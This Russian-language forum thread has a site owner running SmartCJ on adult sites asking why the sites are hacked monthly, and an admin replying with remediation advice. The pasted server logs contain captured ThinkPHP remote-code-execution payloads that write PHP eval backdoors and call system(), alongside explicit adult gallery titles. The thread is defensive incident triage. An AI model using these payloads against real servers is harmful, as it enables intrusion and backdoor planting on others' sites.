Заливают вирус mysql inject

Post Reply
awmxex
Posts: 42
Joined: Fri Mar 23, 2018 10:09 am
Contact:

Заливают вирус mysql inject

Post by awmxex »

Здравствуйте, вот такая проблема
Ломают сайт ( на хосте в папке сайта появляется файл php, и потом как я понимаю занружают шелл ну и начинают лазить по всем сайтам "юзера"инклюдят редиректы, в хтаксесе, так в конфиге smartcj прописывают echo '<script type="text/javascript" src="x/includes/js/jquery.min.js"></script>'; итд. Ломают стабильно раз в месяц)

И в логах вот такая штука:

Code: Select all

, Array
(
    [0] => Array
        (
            [file] => /var/www/smartcj.com/xxx/bin/cron.php
            [line] => 0
            [function] => db_query
            [args] => Array
                (
                    [0] => INSERT IGNORE INTO links (trader, hour, link, num) VALUES  ('spiders', '463655', 'lp_in_//index.php/module/action/param1/$%7B@eval($_POST%5Bc%5D)%7D', '3'),  ('spiders', '463655', 'lp_in_/', '1'),  ('pinksextube.com', '463655', 'lp_in_/', '1'),  ('mobile', '463655', 'lp_in_/', '1'),  ('pornojam.com', '463655', 'lp_in_/', '1') ON DUPLICATE KEY UPDATE num=num + VALUES(num) 
                )
        )
    [1] => Array
        (
            [file] => /var/www/smartcj.com/xxx/bin/cron.php
            [line] => 0
            [function] => process_traffic
            [args] => Array
                (
                )
        )
)
 (0.14209699630737, 0.12500286102295) 
2022-11-22 19:11 Query w eval (debug: /*check query*/ ): INSERT IGNORE INTO links (trader, hour, link, num) VALUES  ('spiders', '463656', 'lp_in_//index.php/Index/index/name/$%7B@eval($_POST%5Bc%5D)%7D', '3') ON DUPLICATE KEY UPDATE num=num + VALUES(num) , request Array
(
    [cron.php] => 
)
, Array
(
    [0] => Array
        (
            [file] => /var/www/smartcj.com/xxx/bin/cron.php
            [line] => 0
            [function] => db_query
            [args] => Array
                (
                    [0] => INSERT IGNORE INTO links (trader, hour, link, num) VALUES  ('spiders', '463656', 'lp_in_//index.php/Index/index/name/$%7B@eval($_POST%5Bc%5D)%7D', '3') ON DUPLICATE KEY UPDATE num=num + VALUES(num) 
                )
        )
    [1] => Array
        (
            [file] => /var/www/smartcj.com/xxx/bin/cron.php
            [line] => 0
            [function] => process_traffic
            [args] => Array
                (
                )
        )
)
 (0.12938213348389, 0.075680017471313) 
awmxex
Posts: 42
Joined: Fri Mar 23, 2018 10:09 am
Contact:

Re: Заливают вирус mysql inject

Post by awmxex »

вот по второму сайту

Code: Select all

, Array
(
    [0] => Array
        (
            [file] => /var/www/smartcj.com/xxx/bin/cron.php
            [line] => 0
            [function] => db_query
            [args] => Array
                (
                    [0] => INSERT IGNORE INTO links (trader, hour, link, num) VALUES  ('spiders', '463655', 'images/53x7x32797', '2'),  ('spiders', '463655', 'lp_in_/gallery/sky-angel-174-part-1-an-koji/index.html?53x7x32797', '1'),  ('spiders', '463655', 'lp_in_/', '1'),  ('spiders', '463655', 'lp_in_/?id=xhamstervideo.org', '1'),  ('spiders', '463655', 'lp_in_//index.php/module/action/param1/$%7B@eval($_POST%5Bc%5D)%7D', '2'),  ('spiders', '463655', 'images/53x83x26690', '2'),  ('spiders', '463655', 'lp_in_/gallery/don-t-fuck-my-daughter-petite-redhead-teen-dolly/index.html?53x83x26690', '1'),  ('spiders', '463655', 'images/53x134x30051', '2'),  ('spiders', '463655', 'lp_in_/gallery/skinny-teen-with-big-tits-get-creampie/index.html?53x134x30051', '1'),  ('spiders', '463655', 'images/53x140x21396', '2'),  ('spiders', '463655', 'lp_in_/gallery/teen-gets-anal-a-facial/index.html?53x140x21396', '1'),  ('1.smartcj.sponsor', '463655', 'images/53x7x32797', '1'),  ('1.smartcj.sponsor', '463655', 'images/53x83x26690', '1'),  ('1.smartcj.sponsor', '463655', 'images/53x134x30051', '1'),  ('1.smartcj.sponsor', '463655', 'images/53x140x21396', '1'),  ('thesexcloud.com', '463655', 'lp_in_/', '1'),  ('thesexcloud.com', '463655', 'images/53x4x20779', '1'),  ('overclicks', '463655', 'overclick_from_abellalist.com', '1'),  ('mobile', '463655', 'overclick_from_abellalist.com', '1') ON DUPLICATE KEY UPDATE num=num + VALUES(num) 
                )
        )
    [1] => Array
        (
            [file] => /var/www/smartcj.com/xxx/bin/cron.php
            [line] => 0
            [function] => process_traffic
            [args] => Array
                (
                )
        )
)
 (0.18801689147949, 0.16338300704956) 
2022-11-22 18:59 Query w eval (debug: /*check query*/ ): INSERT IGNORE INTO links (trader, hour, link, num) VALUES  ('domaintrader.com', '463655', 'lp_in_/', '1'),  ('domaintrader.com', '463655', 'images/53x51x21169', '1'),  ('', '463655', 'images/53x100x21115', '1'),  ('', '463655', 'images/53x45x31850', '1'),  ('teensexhq.com', '463655', 'lp_in_/', '1'),  ('mobile', '463655', 'lp_in_/', '2'),  ('mobile', '463655', 'images/53x2x32538', '1'),  ('mobile', '463655', 'lp_in_/', '1'),  ('teenclips.tv', '463655', 'lp_in_/', '1'),  ('teenclips.tv', '463655', 'images/53x2x32538', '1'),  ('spiders', '463655', 'images/53x61x23020', '2'),  ('spiders', '463655', 'lp_in_/gallery/fuck-my-sis-while-neighbors-are-fucking/index.html?53x61x23020', '1'),  ('spiders', '463655', 'images/53x52x20140', '2'),  ('spiders', '463655', 'lp_in_/gallery/4k-tiny4k-super-tiny-kacey-jordan-pounded-by-big/index.html?53x52x20140', '1'),  ('spiders', '463655', 'images/53x103x31830', '2'),  ('spiders', '463655', 'lp_in_/gallery/kenzie-reeves-in-i-fuck-my-daddy-for-first-time/index.html?53x103x31830', '1'),  ('spiders', '463655', 'lp_in_//index.php/Index/index/name/$%7B@eval($_POST%5Bc%5D)%7D', '1'),  ('spiders', '463655', 'images/53x63x20954', '2'),  ('spiders', '463655', 'lp_in_/gallery/bravo-sex-legal-age-teenagers/index.html?53x63x20954', '1'),  ('spiders', '463655', 'images/53x96x26480', '2'),  ('spiders', '463655', 'lp_in_/gallery/blonde-girl-outdoor-sex/index.html?53x96x26480', '1'),  ('spiders', '463655', 'images/53x109x21170', '2'),  ('spiders', '463655', 'lp_in_/gallery/extra-petite-and-small-chick-got-fucked-by-big-dick/index.html?53x109x21170', '1'),  ('1.smartcj.sponsor', '463655', 'images/53x61x23020', '1'),  ('1.smartcj.sponsor', '463655', 'images/53x52x20140', '1'),  ('1.smartcj.sponsor', '463655', 'images/53x103x31830', '1'),  ('1.smartcj.sponsor', '463655', 'images/53x63x20954', '1'),  ('1.smartcj.sponsor', '463655', 'images/53x96x26480', '1'),  ('1.smartcj.sponsor', '463655', 'images/53x109x21170', '1'),  ('noref', '463655', 'lp_in_/', '1'),  ('doseofporn.com', '463655', 'lp_in_/', '1'),  ('doseofporn.com', '463655', 'images/53x89x32244', '1'),  ('coolxteen.top', '463655', 'lp_in_/', '1'),  ('bookmarks', '463655', 'lp_in_/', '1') ON DUPLICATE KEY UPDATE num=num + VALUES(num) , request Array
(
    [cron.php] => 
)
    [1] => Array
        (
            [file] => /var/www/smartcj.com/xxx/bin/cron.php
            [line] => 0
            [function] => process_traffic
            [args] => Array
                (
                )
        )
)
 (0.32670617103577, 0.30425500869751) 
awmxex
Posts: 42
Joined: Fri Mar 23, 2018 10:09 am
Contact:

Re: Заливают вирус mysql inject

Post by awmxex »

третий сайт

Code: Select all

, Array
(
    [0] => Array
        (
            [file] => /var/www/smartcj.com/xxx/bin/cron.php
            [line] => 0
            [function] => db_query
            [args] => Array
                (
                    [0] => INSERT IGNORE INTO links (trader, hour, link, num) VALUES  ('handyhardcore.com', '462848', 'images/54x1x423', '1'),  ('notrade', '462848', 'lp_in_/', '2'),  ('notrade', '462848', 'images/54x1x278028', '1'),  ('yourpassiontube.com', '462848', 'lp_in_/', '1'),  ('mobile', '462848', 'lp_in_/', '2'),  ('mobile', '462848', 'images/', '1'),  ('amateurporn.me', '462848', 'lp_in_/', '1'),  ('therapyporn.com', '462848', 'lp_in_/', '1'),  ('driveprontube.com', '462848', 'images/', '1'),  ('noref', '462848', 'lp_in_/index.php', '1'),  ('noref', '462848', 'lp_in_/index.php/?s=index/\\think\\template\\driver\\file/write&cacheFile=xml0.php&content=<?php%20@eval($_POST[terry]);print(md5(123));?>', '1'),  ('family-sex.me', '462848', 'lp_in_/', '1') ON DUPLICATE KEY UPDATE num=num + VALUES(num) 
                )
        )
    [1] => Array
        (
            [file] => /var/www/smartcj.com/xxx/bin/cron.php
            [line] => 0
            [function] => process_traffic
            [args] => Array
                (
                )
        )
)
 (0.12750101089478, 0.081847906112671) 
2022-10-20 04:15 Query w eval (debug: /*check query*/ ): INSERT IGNORE INTO links (trader, hour, link, num) VALUES  ('noref', '462848', 'lp_in_/index.php/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=xml1.php&vars[1][]=<?php%20@eval($_POST[terry]);print(md5(123));?>', '1'),  ('noref', '462848', 'lp_in_/index.php/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20\'<?php%20@eval($_POST[terry]);print(md5(123));?>\'>xml2.php', '1'),  ('noref', '462848', 'lp_in_/index.php?a=fetch&templateFile=public/inde&prefix=%27%27&content=<php>file_put_contents(\'9sdebug.php\',\'%3C%3Fphp%0Aecho%20md5(%22ThinkCMF%22)%3B%0Aeval(%40%24_POST%5B%22terry%22%5D)%3B%0A%3F%3E\')</php>', '1'),  ('noref', '462848', 'lp_in_/index.php', '1'),  ('notrade', '462848', 'lp_in_/', '5'),   ('mobile', '462848', 'lp_in_/', '2') ON DUPLICATE KEY UPDATE num=num + VALUES(num) , request Array
(
    [cron.php] => 
)
, Array
(
    [0] => Array
        (
            [file] => /var/www/smartcj.com/xxx/bin/cron.php
            [line] => 0
            [function] => db_query
            [args] => Array
                (
                    [0] => INSERT IGNORE INTO links (trader, hour, link, num) VALUES  ('noref', '462848', 'lp_in_/index.php/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=xml1.php&vars[1][]=<?php%20@eval($_POST[terry]);print(md5(123));?>', '1'),  ('noref', '462848', 'lp_in_/index.php/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20\'<?php%20@eval($_POST[terry]);print(md5(123));?>\'>xml2.php', '1'),  ('noref', '462848', 'lp_in_/index.php?a=fetch&templateFile=public/inde&prefix=%27%27&content=<php>file_put_contents(\'9sdebug.php\',\'%3C%3Fphp%0Aecho%20md5(%22ThinkCMF%22)%3B%0Aeval(%40%24_POST%5B%22terry%22%5D)%3B%0A%3F%3E\')</php>', '1'),  ('noref', '462848', 'lp_in_/index.php', '1'),  ('notrade', '462848', 'lp_in_/', '5'),  '462848', 'lp_in_/', '2') ON DUPLICATE KEY UPDATE num=num + VALUES(num) 
                )
        )
    [1] => Array
        (
            [file] => /var/www/smartcj.com/xxx/bin/cron.php
            [line] => 0
            [function] => process_traffic
            [args] => Array
                (
                )
        )
)
 (0.17752408981323, 0.14559102058411) 
admin
Site Admin
Posts: 37202
Joined: Wed Sep 10, 2008 11:43 am

Re: Заливают вирус mysql inject

Post by admin »

1. то что вы запостили - значит только то что у вас не проведены апдейты, в апдейтах логгирование таких запросов отключено

2. запросы вида //index.php/module/action/param1/$%7B@eval($_POST%5Bc%5D)%7 это старая проблема thinkphp.cn
https://www.exploit-db.com/exploits/46150
автоматических сканерах дыр в сайтах они прописаны и оно пробует это на каждом сайте.



3. mysql inject это совсем другое, думаю проще вам прочесть в гугле что это, оно в разборе этого вопроса не пригодится , но для общего развития все полезно


Теперь конкретно по взлому

1. скрипт шела от каокго юзера ?
2. Как я понимаю по "так в конфиге smartcj прописывают echo" файл создан от юзера, а не от веба - это первый же показательчто взлом не с веба


Что делать

1. сделайт апдейты что б вас не волновали надписи в админке и вы не думали что по логу в админке сразу видно взлом
2. конечно удалить такущие шелы
3. сделать логгирование процессов которые создают файл и понять какой процесс создал файл шела, тогда будет ясно куда копать дальше
Don't forget to run script update
Post Reply